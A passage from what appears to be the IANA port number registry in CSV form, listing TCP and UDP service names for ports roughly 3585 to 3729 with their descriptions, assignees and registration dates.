Protocol,[Bodo_Rueskamp],[Bodo_Rueskamp],2002-08,,,,, emprise-lls,3585,tcp,Emprise License Server,,,,,,,, emprise-lls,3585,udp,Emprise License Server,,,,,,,, emprise-lsc,3586,tcp,License Server Console,[James_J_Diaz],[James_J_Diaz],2002-08,,,,, emprise-lsc,3586,udp,License Server Console,[James_J_Diaz],[James_J_Diaz],2002-08,,,,, p2pgroup,3587,tcp,Peer to Peer Grouping,[Igor_Kostic],[Igor_Kostic],2002-08,,,,, p2pgroup,3587,udp,Peer to Peer Grouping,[Igor_Kostic],[Igor_Kostic],2002-08,,,,, sentinel,3588,tcp,Sentinel Server,[Ian_Gordon],[Ian_Gordon],2002-08,,,,, sentinel,3588,udp,Sentinel Server,[Ian_Gordon],[Ian_Gordon],2002-08,,,,, isomair,3589,tcp,isomair,[Richard_Fleming],[Richard_Fleming],2002-08,,,,, isomair,3589,udp,isomair,[Richard_Fleming],[Richard_Fleming],2002-08,,,,, wv-csp-sms,3590,tcp,WV CSP SMS Binding,[Matti_Salmi],[Matti_Salmi],2002-08,,,,, wv-csp-sms,3590,udp,WV CSP SMS Binding,[Matti_Salmi],[Matti_Salmi],2002-08,,,,, gtrack-server,3591,tcp,LOCANIS G-TRACK Server,,,,,,,, gtrack-server,3591,udp,LOCANIS G-TRACK Server,,,,,,,, gtrack-ne,3592,tcp,LOCANIS G-TRACK NE Port,[Juergen_Edelhaeuser],[Juergen_Edelhaeuser],2002-08,,,,, gtrack-ne,3592,udp,LOCANIS G-TRACK NE Port,[Juergen_Edelhaeuser],[Juergen_Edelhaeuser],2002-08,,,,, bpmd,3593,tcp,BP Model Debugger,[Keith_Fligg],[Keith_Fligg],2002-09,,,,, bpmd,3593,udp,BP Model Debugger,[Keith_Fligg],[Keith_Fligg],2002-09,,,,, mediaspace,3594,tcp,MediaSpace,,,,,,,, mediaspace,3594,udp,MediaSpace,,,,,,,, shareapp,3595,tcp,ShareApp,[Jeff_King],[Jeff_King],2002-09,,,,, shareapp,3595,udp,ShareApp,[Jeff_King],[Jeff_King],2002-09,,,,, iw-mmogame,3596,tcp,Illusion Wireless MMOG,[Jan_Vrsinsky],[Jan_Vrsinsky],2002-09,,,,, iw-mmogame,3596,udp,Illusion Wireless MMOG,[Jan_Vrsinsky],[Jan_Vrsinsky],2002-09,,,,, a14,3597,tcp,A14 (AN-to-SC/MM),,,,,,,, a14,3597,udp,A14 (AN-to-SC/MM),,,,,,,, a15,3598,tcp,A15 (AN-to-AN),[David_Ott],[David_Ott],2002-09,,,,, a15,3598,udp,A15 (AN-to-AN),[David_Ott],[David_Ott],2002-09,,,,, quasar-server,3599,tcp,Quasar Accounting Server,[Brad_Pepers],[Brad_Pepers],2002-09,,,,, quasar-server,3599,udp,Quasar Accounting Server,[Brad_Pepers],[Brad_Pepers],2002-09,,,,, trap-daemon,3600,tcp,text relay-answer,[John_Willis],[John_Willis],2002-09,,,,, trap-daemon,3600,udp,text relay-answer,[John_Willis],[John_Willis],2002-09,,,,, visinet-gui,3601,tcp,Visinet Gui,[Jeff_Douglass],[Jeff_Douglass],2002-09,,,,, visinet-gui,3601,udp,Visinet Gui,[Jeff_Douglass],[Jeff_Douglass],2002-09,,,,, infiniswitchcl,3602,tcp,InfiniSwitch Mgr Client,[Lee_VanTine],[Lee_VanTine],2002-09,,,,, infiniswitchcl,3602,udp,InfiniSwitch Mgr Client,[Lee_VanTine],[Lee_VanTine],2002-09,,,,, int-rcv-cntrl,3603,tcp,Integrated Rcvr Control,[Dave_Stone],[Dave_Stone],2002-09,,,,, int-rcv-cntrl,3603,udp,Integrated Rcvr Control,[Dave_Stone],[Dave_Stone],2002-09,,,,, bmc-jmx-port,3604,tcp,BMC JMX Port,[Portnoy_Boxman],[Portnoy_Boxman],2002-09,,,,, bmc-jmx-port,3604,udp,BMC JMX Port,[Portnoy_Boxman],[Portnoy_Boxman],2002-09,,,,, comcam-io,3605,tcp,ComCam IO Port,[Don_Gilbreath],[Don_Gilbreath],2002-09,,,,, comcam-io,3605,udp,ComCam IO Port,[Don_Gilbreath],[Don_Gilbreath],2002-09,,,,, splitlock,3606,tcp,Splitlock Server,[Andrew_Tune],[Andrew_Tune],2002-09,,,,, splitlock,3606,udp,Splitlock Server,[Andrew_Tune],[Andrew_Tune],2002-09,,,,, precise-i3,3607,tcp,Precise I3,[Tomer_Shain],[Tomer_Shain],2002-09,,,,, precise-i3,3607,udp,Precise I3,[Tomer_Shain],[Tomer_Shain],2002-09,,,,, trendchip-dcp,3608,tcp,Trendchip control protocol,[Ming_Jen_Chen],[Ming_Jen_Chen],2002-09,,,,, trendchip-dcp,3608,udp,Trendchip control protocol,[Ming_Jen_Chen],[Ming_Jen_Chen],2002-09,,,,, cpdi-pidas-cm,3609,tcp,CPDI PIDAS Connection Mon,[Tony_Splaver],[Tony_Splaver],2002-09,,,,, cpdi-pidas-cm,3609,udp,CPDI PIDAS Connection Mon,[Tony_Splaver],[Tony_Splaver],2002-09,,,,, echonet,3610,tcp,ECHONET,[Takeshi_Saito],[Takeshi_Saito],2002-09,,,,, echonet,3610,udp,ECHONET,[Takeshi_Saito],[Takeshi_Saito],2002-09,,,,, six-degrees,3611,tcp,Six Degrees Port,[Zach_Nies],[Zach_Nies],2002-09,,,,, six-degrees,3611,udp,Six Degrees Port,[Zach_Nies],[Zach_Nies],2002-09,,,,, hp-dataprotect,3612,tcp,HP Data Protector,[Hewlett_Packard_2],[Oliver_Breyel],2002-09,2013-02-07,,,, hp-dataprotect,3612,udp,HP Data Protector,[Hewlett_Packard_2],[Oliver_Breyel],2002-09,2013-02-07,,,, alaris-disc,3613,tcp,Alaris Device Discovery,[Chris_Dern],[Chris_Dern],2004-06,,,,, alaris-disc,3613,udp,Alaris Device Discovery,[Chris_Dern],[Chris_Dern],2004-06,,,,, sigma-port,3614,tcp,Satchwell Sigma,[Dave_Chapman],[Dave_Chapman],2011-06-06,,,,, sigma-port,3614,udp,Satchwell Sigma,[Dave_Chapman],[Dave_Chapman],2011-06-06,,,,, start-network,3615,tcp,Start Messaging Network,[Peter_Rocca],[Peter_Rocca],2002-10,,,,, start-network,3615,udp,Start Messaging Network,[Peter_Rocca],[Peter_Rocca],2002-10,,,,, cd3o-protocol,3616,tcp,cd3o Control Protocol,[Chris_Wilcox],[Chris_Wilcox],2002-10,,,,, cd3o-protocol,3616,udp,cd3o Control Protocol,[Chris_Wilcox],[Chris_Wilcox],2002-10,,,,, sharp-server,3617,tcp,ATI SHARP Logic Engine,[Bill_Reveile],[Bill_Reveile],,,,,, sharp-server,3617,udp,ATI SHARP Logic Engine,[Bill_Reveile],[Bill_Reveile],,,,,, aairnet-1,3618,tcp,AAIR-Network 1,,,,,,,, aairnet-1,3618,udp,AAIR-Network 1,,,,,,,, aairnet-2,3619,tcp,AAIR-Network 2,[James_Mealey],[James_Mealey],2002-10,,,,, aairnet-2,3619,udp,AAIR-Network 2,[James_Mealey],[James_Mealey],2002-10,,,,, ep-pcp,3620,tcp,EPSON Projector Control Port,,,,,,,, ep-pcp,3620,udp,EPSON Projector Control Port,,,,,,,, ep-nsp,3621,tcp,EPSON Network Screen Port,[SEIKO_EPSON_3],[SEIKO_EPSON_3],2002-10,,,,, ep-nsp,3621,udp,EPSON Network Screen Port,[SEIKO_EPSON_3],[SEIKO_EPSON_3],2002-10,,,,, ff-lr-port,3622,tcp,FF LAN Redundancy Port,[Fieldbus_Foundation],[Fieldbus_Foundation],2002-10,,,,, ff-lr-port,3622,udp,FF LAN Redundancy Port,[Fieldbus_Foundation],[Fieldbus_Foundation],2002-10,,,,, haipe-discover,3623,tcp,HAIPIS Dynamic Discovery,[Mike_Irani],[Mike_Irani],2002-10,,,,, haipe-discover,3623,udp,HAIPIS Dynamic Discovery,[Mike_Irani],[Mike_Irani],2002-10,,,,, dist-upgrade,3624,tcp,Distributed Upgrade Port,[Jason_Schoon],[Jason_Schoon],2002-10,,,,, dist-upgrade,3624,udp,Distributed Upgrade Port,[Jason_Schoon],[Jason_Schoon],2002-10,,,,, volley,3625,tcp,Volley,[David_Catmull],[David_Catmull],2002-10,,,,, volley,3625,udp,Volley,[David_Catmull],[David_Catmull],2002-10,,,,, bvcdaemon-port,3626,tcp,bvControl Daemon,[Ravi_Gokhale],[Ravi_Gokhale],2002-10,,,,, bvcdaemon-port,3626,udp,bvControl Daemon,[Ravi_Gokhale],[Ravi_Gokhale],2002-10,,,,, jamserverport,3627,tcp,Jam Server Port,[Art_Pope],[Art_Pope],2002-10,,,,, jamserverport,3627,udp,Jam Server Port,[Art_Pope],[Art_Pope],2002-10,,,,, ept-machine,3628,tcp,EPT Machine Interface,[Victor_H_Farrace],[Victor_H_Farrace],2002-10,,,,, ept-machine,3628,udp,EPT Machine Interface,[Victor_H_Farrace],[Victor_H_Farrace],2002-10,,,,, escvpnet,3629,tcp,ESC/VP.net,[Hiroyuki_Hashimoto],[Hiroyuki_Hashimoto],2002-10,,,,, escvpnet,3629,udp,ESC/VP.net,[Hiroyuki_Hashimoto],[Hiroyuki_Hashimoto],2002-10,,,,, cs-remote-db,3630,tcp,C&S Remote Database Port,,,,,,,, cs-remote-db,3630,udp,C&S Remote Database Port,,,,,,,, cs-services,3631,tcp,C&S Web Services Port,[Computer_Software_Gm],[Computer_Software_Gm],2002-10,,,,, cs-services,3631,udp,C&S Web Services Port,[Computer_Software_Gm],[Computer_Software_Gm],2002-10,,,,, distcc,3632,tcp,distributed compiler,[Martin_Pool],[Martin_Pool],2002-11,,,,,Defined TXT keys: None distcc,3632,udp,distributed compiler,[Martin_Pool],[Martin_Pool],2002-11,,,,,Defined TXT keys: None wacp,3633,tcp,Wyrnix AIS port,[Harry_T_Vennik],[Harry_T_Vennik],2002-11,,,,, wacp,3633,udp,Wyrnix AIS port,[Harry_T_Vennik],[Harry_T_Vennik],2002-11,,,,, hlibmgr,3634,tcp,hNTSP Library Manager,[Kenji_Tetsuyama],[Kenji_Tetsuyama],2002-11,,,,, hlibmgr,3634,udp,hNTSP Library Manager,[Kenji_Tetsuyama],[Kenji_Tetsuyama],2002-11,,,,, sdo,3635,tcp,Simple Distributed Objects,[Alexander_Philippou],[Alexander_Philippou],2002-11,,,,, sdo,3635,udp,Simple Distributed Objects,[Alexander_Philippou],[Alexander_Philippou],2002-11,,,,, servistaitsm,3636,tcp,SerVistaITSM,[Ralph_Campbell],[Ralph_Campbell],2002-11,,,,, servistaitsm,3636,udp,SerVistaITSM,[Ralph_Campbell],[Ralph_Campbell],2002-11,,,,, scservp,3637,tcp,Customer Service Port,[Jonathan_A_Zdziarsk],[Jonathan_A_Zdziarsk],2002-11,,,,, scservp,3637,udp,Customer Service Port,[Jonathan_A_Zdziarsk],[Jonathan_A_Zdziarsk],2002-11,,,,, ehp-backup,3638,tcp,EHP Backup Protocol,[Ed_Fair],[Ed_Fair],2002-11,,,,, ehp-backup,3638,udp,EHP Backup Protocol,[Ed_Fair],[Ed_Fair],2002-11,,,,, xap-ha,3639,tcp,Extensible Automation,[Mark_Harrison],[Mark_Harrison],2002-11,,,,, xap-ha,3639,udp,Extensible Automation,[Mark_Harrison],[Mark_Harrison],2002-11,,,,, netplay-port1,3640,tcp,Netplay Port 1,,,,,,,, netplay-port1,3640,udp,Netplay Port 1,,,,,,,, netplay-port2,3641,tcp,Netplay Port 2,[Predrag_Filipovic],[Predrag_Filipovic],2002-11,,,,, netplay-port2,3641,udp,Netplay Port 2,[Predrag_Filipovic],[Predrag_Filipovic],2002-11,,,,, juxml-port,3642,tcp,Juxml Replication port,[Colin_Reid],[Colin_Reid],2002-11,,,,, juxml-port,3642,udp,Juxml Replication port,[Colin_Reid],[Colin_Reid],2002-11,,,,, audiojuggler,3643,tcp,AudioJuggler,[Morten_Mertner],[Morten_Mertner],2002-11,,,,, audiojuggler,3643,udp,AudioJuggler,[Morten_Mertner],[Morten_Mertner],2002-11,,,,, ssowatch,3644,tcp,ssowatch,[Marie_France_Dubreui],[Marie_France_Dubreui],2002-11,,,,, ssowatch,3644,udp,ssowatch,[Marie_France_Dubreui],[Marie_France_Dubreui],2002-11,,,,, cyc,3645,tcp,Cyc,[Stephen_Reed],[Stephen_Reed],2003-01,,,,, cyc,3645,udp,Cyc,[Stephen_Reed],[Stephen_Reed],2003-01,,,,, xss-srv-port,3646,tcp,XSS Server Port,[Joe_Purcell],[Joe_Purcell],2003-01,,,,, xss-srv-port,3646,udp,XSS Server Port,[Joe_Purcell],[Joe_Purcell],2003-01,,,,, splitlock-gw,3647,tcp,Splitlock Gateway,[Andrew_Tune],[Andrew_Tune],2003-01,,,,, splitlock-gw,3647,udp,Splitlock Gateway,[Andrew_Tune],[Andrew_Tune],2003-01,,,,, fjcp,3648,tcp,Fujitsu Cooperation Port,[Kouji_Sugisawa],[Kouji_Sugisawa],2003-01,,,,, fjcp,3648,udp,Fujitsu Cooperation Port,[Kouji_Sugisawa],[Kouji_Sugisawa],2003-01,,,,, nmmp,3649,tcp,Nishioka Miyuki Msg Protocol,[TAKEDA_Hiroyuki],[TAKEDA_Hiroyuki],2003-01,,,,, nmmp,3649,udp,Nishioka Miyuki Msg Protocol,[TAKEDA_Hiroyuki],[TAKEDA_Hiroyuki],2003-01,,,,, prismiq-plugin,3650,tcp,PRISMIQ VOD plug-in,[Richard_Hodges_3],[Richard_Hodges_3],2003-01,,,,, prismiq-plugin,3650,udp,PRISMIQ VOD plug-in,[Richard_Hodges_3],[Richard_Hodges_3],2003-01,,,,, xrpc-registry,3651,tcp,XRPC Registry,[Slava_Monich],[Slava_Monich],2003-01,,,,, xrpc-registry,3651,udp,XRPC Registry,[Slava_Monich],[Slava_Monich],2003-01,,,,, vxcrnbuport,3652,tcp,VxCR NBU Default Port,[Boris_Star],[Boris_Star],2003-01,,,,, vxcrnbuport,3652,udp,VxCR NBU Default Port,[Boris_Star],[Boris_Star],2003-01,,,,, tsp,3653,tcp,Tunnel Setup Protocol,[Marc_Blanchet],[Marc_Blanchet],2003-01,,[RFC5572],,, tsp,3653,udp,Tunnel Setup Protocol,[Marc_Blanchet],[Marc_Blanchet],2003-01,,[RFC5572],,, vaprtm,3654,tcp,VAP RealTime Messenger,[Boris_Polevoy],[Boris_Polevoy],2003-01,,,,, vaprtm,3654,udp,VAP RealTime Messenger,[Boris_Polevoy],[Boris_Polevoy],2003-01,,,,, abatemgr,3655,tcp,ActiveBatch Exec Agent,,,,,,,, abatemgr,3655,udp,ActiveBatch Exec Agent,,,,,,,, abatjss,3656,tcp,ActiveBatch Job Scheduler,[Ben_Rosenberg],[Ben_Rosenberg],2003-01,,,,, abatjss,3656,udp,ActiveBatch Job Scheduler,[Ben_Rosenberg],[Ben_Rosenberg],2003-01,,,,, immedianet-bcn,3657,tcp,ImmediaNet Beacon,[Bill_Homan],[Bill_Homan],2003-01,,,,, immedianet-bcn,3657,udp,ImmediaNet Beacon,[Bill_Homan],[Bill_Homan],2003-01,,,,, ps-ams,3658,tcp,PlayStation AMS (Secure),[Edgar_Alan_Tu],[Edgar_Alan_Tu],2003-01,,,,, ps-ams,3658,udp,PlayStation AMS (Secure),[Edgar_Alan_Tu],[Edgar_Alan_Tu],2003-01,,,,, apple-sasl,3659,tcp,Apple SASL,[David_M_O_Rourke],[David_M_O_Rourke],2003-01,,,,, apple-sasl,3659,udp,Apple SASL,[David_M_O_Rourke],[David_M_O_Rourke],2003-01,,,,, can-nds-ssl,3660,tcp,IBM Tivoli Directory Service using SSL,,,,,,,, can-nds-ssl,3660,udp,IBM Tivoli Directory Service using SSL,,,,,,,, can-ferret-ssl,3661,tcp,IBM Tivoli Directory Service using SSL,[Nic_Catrambone],[Nic_Catrambone],2003-01,,,,, can-ferret-ssl,3661,udp,IBM Tivoli Directory Service using SSL,[Nic_Catrambone],[Nic_Catrambone],2003-01,,,,, pserver,3662,tcp,pserver,[Patrick_Furlong],[Patrick_Furlong],2003-01,,,,, pserver,3662,udp,pserver,[Patrick_Furlong],[Patrick_Furlong],2003-01,,,,, dtp,3663,tcp,DIRECWAY Tunnel Protocol,[John_Border],[John_Border],2003-01,,,,, dtp,3663,udp,DIRECWAY Tunnel Protocol,[John_Border],[John_Border],2003-01,,,,, ups-engine,3664,tcp,UPS Engine Port,,,,,,,, ups-engine,3664,udp,UPS Engine Port,,,,,,,, ent-engine,3665,tcp,Enterprise Engine Port,[Mike_Delgrosso],[Mike_Delgrosso],2003-01,,,,, ent-engine,3665,udp,Enterprise Engine Port,[Mike_Delgrosso],[Mike_Delgrosso],2003-01,,,,, eserver-pap,3666,tcp,IBM eServer PAP,[Dave_Gimpl],[Dave_Gimpl],2003-01,,,,, eserver-pap,3666,udp,IBM EServer PAP,[Dave_Gimpl],[Dave_Gimpl],2003-01,,,,, infoexch,3667,tcp,IBM Information Exchange,[Paul_Ford_Hutchinson],[Paul_Ford_Hutchinson],2003-01,,,,, infoexch,3667,udp,IBM Information Exchange,[Paul_Ford_Hutchinson],[Paul_Ford_Hutchinson],2003-01,,,,, dell-rm-port,3668,tcp,Dell Remote Management,[Bradley_Bransom],[Bradley_Bransom],2003-01,,,,, dell-rm-port,3668,udp,Dell Remote Management,[Bradley_Bransom],[Bradley_Bransom],2003-01,,,,, casanswmgmt,3669,tcp,CA SAN Switch Management,[Emre_Tunar],[Emre_Tunar],2003-01,,,,, casanswmgmt,3669,udp,CA SAN Switch Management,[Emre_Tunar],[Emre_Tunar],2003-01,,,,, smile,3670,tcp,SMILE TCP/UDP Interface,[Andre_Petras],[Andre_Petras],2003-01,,,,, smile,3670,udp,SMILE TCP/UDP Interface,[Andre_Petras],[Andre_Petras],2003-01,,,,, efcp,3671,tcp,e Field Control (EIBnet),[Marc_Goossens],[Marc_Goossens],2003-01,,,,, efcp,3671,udp,e Field Control (EIBnet),[Marc_Goossens],[Marc_Goossens],2003-01,,,,, lispworks-orb,3672,tcp,LispWorks ORB,[Lisp_Support],[Lisp_Support],,,,,, lispworks-orb,3672,udp,LispWorks ORB,[Lisp_Support],[Lisp_Support],,,,,, mediavault-gui,3673,tcp,Openview Media Vault GUI,[Stephen_Gold],[Stephen_Gold],2003-01,,,,, mediavault-gui,3673,udp,Openview Media Vault GUI,[Stephen_Gold],[Stephen_Gold],2003-01,,,,, wininstall-ipc,3674,tcp,WinINSTALL IPC Port,[Bill_Somerville],[Bill_Somerville],2008-08-13,,,,, wininstall-ipc,3674,udp,WinINSTALL IPC Port,[Bill_Somerville],[Bill_Somerville],2008-08-13,,,,, calltrax,3675,tcp,CallTrax Data Port,[Oliver_Bailey],[Oliver_Bailey],2003-01,,,,, calltrax,3675,udp,CallTrax Data Port,[Oliver_Bailey],[Oliver_Bailey],2003-01,,,,, va-pacbase,3676,tcp,VisualAge Pacbase server,[Dominique_Lelievre],[Dominique_Lelievre],2003-01,,,,, va-pacbase,3676,udp,VisualAge Pacbase server,[Dominique_Lelievre],[Dominique_Lelievre],2003-01,,,,, roverlog,3677,tcp,RoverLog IPC,[Tom_Mayo],[Tom_Mayo],2003-01,,,,, roverlog,3677,udp,RoverLog IPC,[Tom_Mayo],[Tom_Mayo],2003-01,,,,, ipr-dglt,3678,tcp,DataGuardianLT,[Bruce_Carlson],[Bruce_Carlson],2003-01,,,,, ipr-dglt,3678,udp,DataGuardianLT,[Bruce_Carlson],[Bruce_Carlson],2003-01,,,,, Escale (Newton Dock),3679,tcp,Newton Dock,[Paul_Guyot],[Paul_Guyot],,2011-11-09,,,, Escale (Newton Dock),3679,udp,Newton Dock,[Paul_Guyot],[Paul_Guyot],,2011-11-09,,,, npds-tracker,3680,tcp,NPDS Tracker,[Paul_Guyot],[Paul_Guyot],2003-01,,,,, npds-tracker,3680,udp,NPDS Tracker,[Paul_Guyot],[Paul_Guyot],2003-01,,,,, bts-x73,3681,tcp,BTS X73 Port,[Todd_Cooper],[Todd_Cooper],2003-01,,,,, bts-x73,3681,udp,BTS X73 Port,[Todd_Cooper],[Todd_Cooper],2003-01,,,,, cas-mapi,3682,tcp,EMC SmartPackets-MAPI,[Koen_Schoofs],[Koen_Schoofs],2003-01,,,,, cas-mapi,3682,udp,EMC SmartPackets-MAPI,[Koen_Schoofs],[Koen_Schoofs],2003-01,,,,, bmc-ea,3683,tcp,BMC EDV/EA,[Portnoy_Boxman],[Portnoy_Boxman],2003-01,,,,, bmc-ea,3683,udp,BMC EDV/EA,[Portnoy_Boxman],[Portnoy_Boxman],2003-01,,,,, faxstfx-port,3684,tcp,FAXstfX,[Alec_Carlson],[Alec_Carlson],2003-01,,,,, faxstfx-port,3684,udp,FAXstfX,[Alec_Carlson],[Alec_Carlson],2003-01,,,,, dsx-agent,3685,tcp,DS Expert Agent,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, dsx-agent,3685,udp,DS Expert Agent,[Jason_Lockett][Melanie_Kacerek],[Jason_Lockett][Melanie_Kacerek],2008-12-16,,,,, tnmpv2,3686,tcp,Trivial Network Management,[Andrea_Premoli],[Andrea_Premoli],2003-01,,,,, tnmpv2,3686,udp,Trivial Network Management,[Andrea_Premoli],[Andrea_Premoli],2003-01,,,,, simple-push,3687,tcp,simple-push,,,,,,,, simple-push,3687,udp,simple-push,,,,,,,, simple-push-s,3688,tcp,simple-push Secure,[C_Enrique_Ortiz],[C_Enrique_Ortiz],2003-01,,,,, simple-push-s,3688,udp,simple-push Secure,[C_Enrique_Ortiz],[C_Enrique_Ortiz],2003-01,,,,, daap,3689,tcp,Digital Audio Access Protocol (iTunes),[Amandeep_Jawa],[Amandeep_Jawa],2003-01,,,,,"Defined TXT keys: txtvers, Version, iTSh Version, Machine ID, Database ID, Machine Name, Password" daap,3689,udp,Digital Audio Access Protocol (iTunes),[Amandeep_Jawa],[Amandeep_Jawa],2003-01,,,,,"Defined TXT keys: txtvers, Version, iTSh Version, Machine ID, Database ID, Machine Name, Password" svn,3690,tcp,Subversion,[Greg_Hudson_2],[Greg_Hudson_2],2003-01,,,,, svn,3690,udp,Subversion,[Greg_Hudson_2],[Greg_Hudson_2],2003-01,,,,, magaya-network,3691,tcp,Magaya Network Port,[Jesus_David_Rodrigue],[Jesus_David_Rodrigue],2003-02,,,,, magaya-network,3691,udp,Magaya Network Port,[Jesus_David_Rodrigue],[Jesus_David_Rodrigue],2003-02,,,,, intelsync,3692,tcp,Brimstone IntelSync,[Davey_Taylor],[Davey_Taylor],2003-02,,,,, intelsync,3692,udp,Brimstone IntelSync,[Davey_Taylor],[Davey_Taylor],2003-02,,,,, ,3693-3694,,Unassigned,,,,2007-04-05,,,, bmc-data-coll,3695,tcp,BMC Data Collection,[Portnoy_Boxman],[Portnoy_Boxman],2003-02,,,,, bmc-data-coll,3695,udp,BMC Data Collection,[Portnoy_Boxman],[Portnoy_Boxman],2003-02,,,,, telnetcpcd,3696,tcp,Telnet Com Port Control,[Thomas_J_Pinkl],[Thomas_J_Pinkl],2003-02,,,,, telnetcpcd,3696,udp,Telnet Com Port Control,[Thomas_J_Pinkl],[Thomas_J_Pinkl],2003-02,,,,, nw-license,3697,tcp,NavisWorks License System,[Tim_Wiegand],[Tim_Wiegand],2003-02,,,,, nw-license,3697,udp,NavisWorks Licnese System,[Tim_Wiegand],[Tim_Wiegand],2003-02,,,,, sagectlpanel,3698,tcp,SAGECTLPANEL,[Mark_Gamble],[Mark_Gamble],2003-02,,,,, sagectlpanel,3698,udp,SAGECTLPANEL,[Mark_Gamble],[Mark_Gamble],2003-02,,,,, kpn-icw,3699,tcp,Internet Call Waiting,[B_J_Kortekaas],[B_J_Kortekaas],2003-02,,,,, kpn-icw,3699,udp,Internet Call Waiting,[B_J_Kortekaas],[B_J_Kortekaas],2003-02,,,,, lrs-paging,3700,tcp,LRS NetPage,[Geoffrey_Wossum],[Geoffrey_Wossum],2003-02,,,,, lrs-paging,3700,udp,LRS NetPage,[Geoffrey_Wossum],[Geoffrey_Wossum],2003-02,,,,, netcelera,3701,tcp,NetCelera,[Tarek_Nabhan],[Tarek_Nabhan],2003-02,,,,, netcelera,3701,udp,NetCelera,[Tarek_Nabhan],[Tarek_Nabhan],2003-02,,,,, ws-discovery,3702,tcp,Web Service Discovery,[Christian_Huitema_2],[Christian_Huitema_2],2003-02,,,,, ws-discovery,3702,udp,Web Service Discovery,[Christian_Huitema_2],[Christian_Huitema_2],2003-02,,,,, adobeserver-3,3703,tcp,Adobe Server 3,,,,,,,, adobeserver-3,3703,udp,Adobe Server 3,,,,,,,, adobeserver-4,3704,tcp,Adobe Server 4,[Frank_Soetebeer],[Frank_Soetebeer],2003-01,,,,, adobeserver-4,3704,udp,Adobe Server 4,[Frank_Soetebeer],[Frank_Soetebeer],2003-01,,,,, adobeserver-5,3705,tcp,Adobe Server 5,[Bernd_Paradies],[Bernd_Paradies],2008-01-14,,,,, adobeserver-5,3705,udp,Adobe Server 5,[Bernd_Paradies],[Bernd_Paradies],2008-01-14,,,,, rt-event,3706,tcp,Real-Time Event Port,,,,,,,, rt-event,3706,udp,Real-Time Event Port,,,,,,,, rt-event-s,3707,tcp,Real-Time Event Secure Port,[Terry_Gin],[Terry_Gin],2003-02,,,,, rt-event-s,3707,udp,Real-Time Event Secure Port,[Terry_Gin],[Terry_Gin],2003-02,,,,, sun-as-iiops,3708,tcp,Sun App Svr - Naming,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, sun-as-iiops,3708,udp,Sun App Svr - Naming,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, ca-idms,3709,tcp,CA-IDMS Server,[Dave_Ross],[Dave_Ross],,,,,, ca-idms,3709,udp,CA-IDMS Server,[Dave_Ross],[Dave_Ross],,,,,, portgate-auth,3710,tcp,PortGate Authentication,[Scott_Harris],[Scott_Harris],2003-02,,,,, portgate-auth,3710,udp,PortGate Authentication,[Scott_Harris],[Scott_Harris],2003-02,,,,, edb-server2,3711,tcp,EBD Server 2,[Carlos_Portela],[Carlos_Portela],2003-02,,,,, edb-server2,3711,udp,EBD Server 2,[Carlos_Portela],[Carlos_Portela],2003-02,,,,, sentinel-ent,3712,tcp,Sentinel Enterprise,[Ian_Gordon_2],[Ian_Gordon_2],2003-03,,,,, sentinel-ent,3712,udp,Sentinel Enterprise,[Ian_Gordon_2],[Ian_Gordon_2],2003-03,,,,, tftps,3713,tcp,TFTP over TLS,[Mark_mayernick],[Mark_mayernick],2003-03,,,,, tftps,3713,udp,TFTP over TLS,[Mark_mayernick],[Mark_mayernick],2003-03,,,,, delos-dms,3714,tcp,DELOS Direct Messaging,[Ekkehard_Morgenstern],[Ekkehard_Morgenstern],2003-03,,,,, delos-dms,3714,udp,DELOS Direct Messaging,[Ekkehard_Morgenstern],[Ekkehard_Morgenstern],2003-03,,,,, anoto-rendezv,3715,tcp,Anoto Rendezvous Port,[Ola_Sandstrom],[Ola_Sandstrom],2003-03,,,,, anoto-rendezv,3715,udp,Anoto Rendezvous Port,[Ola_Sandstrom],[Ola_Sandstrom],2003-03,,,,, wv-csp-sms-cir,3716,tcp,WV CSP SMS CIR Channel,,,,,,,, wv-csp-sms-cir,3716,udp,WV CSP SMS CIR Channel,,,,,,,, wv-csp-udp-cir,3717,tcp,WV CSP UDP/IP CIR Channel,[Jon_Ingi_Ingimundars],[Jon_Ingi_Ingimundars],2003-03,,,,, wv-csp-udp-cir,3717,udp,WV CSP UDP/IP CIR Channel,[Jon_Ingi_Ingimundars],[Jon_Ingi_Ingimundars],2003-03,,,,, opus-services,3718,tcp,OPUS Server Port,[Detlef_Stoever],[Detlef_Stoever],2003-03,,,,, opus-services,3718,udp,OPUS Server Port,[Detlef_Stoever],[Detlef_Stoever],2003-03,,,,, itelserverport,3719,tcp,iTel Server Port,[Mark_Hendricks],[Mark_Hendricks],2003-03,,,,, itelserverport,3719,udp,iTel Server Port,[Mark_Hendricks],[Mark_Hendricks],2003-03,,,,, ufastro-instr,3720,tcp,UF Astro. Instr. Services,[David_B_Hon],[David_B_Hon],2003-03,,,,, ufastro-instr,3720,udp,UF Astro. Instr. Services,[David_B_Hon],[David_B_Hon],2003-03,,,,, xsync,3721,tcp,Xsync,,,,,,,, xsync,3721,udp,Xsync,,,,,,,, xserveraid,3722,tcp,Xserve RAID,[Bob_Bradley],[Bob_Bradley],2003-03,,,,, xserveraid,3722,udp,Xserve RAID,[Bob_Bradley],[Bob_Bradley],2003-03,,,,, sychrond,3723,tcp,Sychron Service Daemon,[Robert_Marinelli],[Robert_Marinelli],2003-03,,,,, sychrond,3723,udp,Sychron Service Daemon,[Robert_Marinelli],[Robert_Marinelli],2003-03,,,,, blizwow,3724,tcp,World of Warcraft,[Domain_Tech],[Domain_Tech],2005-04,,,,, blizwow,3724,udp,World of Warcraft,[Domain_Tech],[Domain_Tech],2005-04,,,,, na-er-tip,3725,tcp,Netia NA-ER Port,[Jean_Pierre_Garcia],[Jean_Pierre_Garcia],2003-04,,,,, na-er-tip,3725,udp,Netia NA-ER Port,[Jean_Pierre_Garcia],[Jean_Pierre_Garcia],2003-04,,,,, array-manager,3726,tcp,Xyratex Array Manager,[David_A_Lethe],[David_A_Lethe],2003-04,,,,, array-manager,3726,udp,Xyartex Array Manager,[David_A_Lethe],[David_A_Lethe],2003-04,,,,, e-mdu,3727,tcp,Ericsson Mobile Data Unit,,,,,,,, e-mdu,3727,udp,Ericsson Mobile Data Unit,,,,,,,, e-woa,3728,tcp,Ericsson Web on Air,[Marco_Casole],[Marco_Casole],2003-04,,,,, e-woa,3728,udp,Ericsson Web on Air,[Marco_Casole],[Marco_Casole],2003-04,,,,, fksp-audit,3729,tcp,Fireking Audit Port,[Richard_Thurman],[Richard_Thurman],2003-04,,,,, fksp-audit,3729,udp,Fireking Audit Port,[Richard_Thurman],[Richard_Thurman],2003-04,,,,, 